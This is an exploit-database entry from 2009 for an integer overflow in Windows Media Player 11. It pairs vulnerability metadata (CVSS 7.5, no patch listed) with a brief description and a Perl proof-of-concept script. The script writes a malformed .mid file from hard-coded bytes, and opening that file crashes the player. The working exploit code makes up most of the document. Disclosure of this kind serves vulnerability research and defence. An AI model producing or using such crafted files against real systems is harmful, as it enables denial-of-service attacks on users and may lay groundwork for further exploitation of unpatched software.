Windows Media Player (.mid file) Integer Overflow PoC

vendor:

Windows Media Player

by:

HuoFu

7,5

CVSS

HIGH

Integer Overflow

190

CWE

Product Name: Windows Media Player

Affected Version From: 11.0.5721.5260

Affected Version To: 11.0.5721.5260

Patch Exists: NO

Related CWE: N/A

CPE: a:microsoft:windows_media_player

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

Windows Media Player (.mid file) Integer Overflow PoC

This exploit is for Windows Media Player. It creates a malicious .mid file which when opened in Windows Media Player, causes an integer overflow resulting in a crash. The malicious .mid file contains a header with a length of 0x6, followed by a track header with a length of 0x4e. The track header contains a malformed MIDI message which causes the integer overflow.

Mitigation:

The user should avoid opening untrusted .mid files in Windows Media Player.

Source

Exploit-DB raw data:

#!/usr/bin/perl
#
# Windows Media Player (.mid file) Integer Overflow PoC
# By HuoFu
#
# Test Windows Media Player.  Ver: 11.0.5721.5260
#

open(Fin, ">crash.mid") || die "can't create crash sample.$!";

$data = "\x4d\x54\x68\x64\x00\x00\x00\x06\x00\x01\x00\x01\x00\x60\x4d\x54".
"\x72\x6b\x00\x00\x00\x4e\x00\xff\x03\x08\x34\x31\x33\x61\x34\x61".
"\x35\x30\x00\x91\x41\x60\x01\x3a\x60\x01\x4a\x60\x01\x50\x60\x7d".
"\x81\x41\x01\x01\x3a\x5f\x8d\xe4\xa0\x01\x50\x01\x3d\x91\x41\x60".
"\x81\x00\x81\x41\x40\x00\x91\x3a\x60\x81\x00\x76\x6f\xcc\x3d\xa6".
"\xc2\x48\xee\x8e\xca\xc2\x57\x00\x91\x50\x60\x81\x00\x81\x50\x40".
"\x00\xff\x2f\x00";

print Fin $data;

close(Fin);

# milw0rm.com [2009-04-15]